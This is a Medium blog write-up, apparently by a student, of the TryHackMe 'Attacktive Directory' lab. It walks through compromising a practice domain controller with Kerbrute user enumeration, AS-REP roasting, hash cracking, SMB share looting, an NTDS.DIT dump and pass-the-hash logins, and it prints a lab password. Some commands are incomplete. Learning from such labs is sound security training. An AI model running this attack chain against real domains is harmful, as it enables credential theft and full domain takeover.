Attacking Active Directory — TryHackMe

Hey guys, this is a write-up for the TryHackMe room “Attacktive Directory”. On this room we are going to exploit a vulnerable Domain Controller (DC).


Install: Impacket and Kerbrute


Starting off, we are going to use Nmap to enumerate this machine

nmap -sC -sV -vv

Useful info:
Port 88: Kerberos-sec
Port 389: LDAP
DNS Domain: spookysec.local
DNS Computer Name: AttacktiveDirectory.spookysec.local

Enumerating Users with Kerbrute

After installing Kerbrute we are going to use the userenum command with the user list that the creator of the room provided us to find valid username on the domain.

./kerbrute userenum — dc spookysec.local -d spookysec.local ‘/root/attacktivedirectory/users.txt’ -t 100

From the results above, two important users are “svc-admin” and “backup”.


After enumerating we will try to exploit a feature of Kerberos with an attack called “ASReproasting”.

ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

We are going to use tool found in the “impacket” folder to find the password hash of the user “svc-admin” from the Key Distribution Cente (KDC). -dc-ip spookysec.local/svc-admin -no-pass Output

Then, we are going to use johnTheRipper to crack the hash

john hash — wordlist=pass.txt

Now that we have the credentials for the “svc-admin” user, we can enumerate SMB shares to check if there is any useful information.

smbclient -L \\\\\\ -U svc-admin → to list shared folders

There are some common shared folders like C$, IPC$, NETLOGON, etc.

The folder “backup” seems interesting.

smbclient \\\\\\backup -U svc-admin → to connect to the server using smb

Inside the folder there is an interesting file:

Inside the file there is a base64 encoded text:

echo “YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw” | base64 -d → to decode it

The results are the credentials of the user “backup@spookysec.local”.

Privilege Escalation

We are going to use a tool from impacket called Using this tool, we are dumping the NTDS.DIT which contained the hashes of every user on the domain. Pen-testers use this tool for password auditing. They start cracking the hashes to check if the users are using a strong password.

Within impacket there is a tool called that can give us all the password hashes for the users synced with Active Directory. spookeysec.local/backup:‘backup2517860’@ -just-dc

We found the password hash of the local admin profile. We can use it to connect to the domain controller with administrator privileges.

We can use the method pass the hash for the local admin account because we have the local admin hash from the we did earlier.

Pass the Hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user’s password, instead of requiring the associated plaintext password as is normally the case.

To connect to the server we can use or evil-winrm: Administrator@ -hashes <HASH>


evil-winrm -i -u Administrator -H <HASH>

The flags are located to the /Desktop directory of each user.

Capturing the flags brings us to the completion of the room.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Andreas Panagi

Andreas Panagi

1 Follower

Cybersecurity / Computer Security student. Writing is the best way to learn. Forever No0B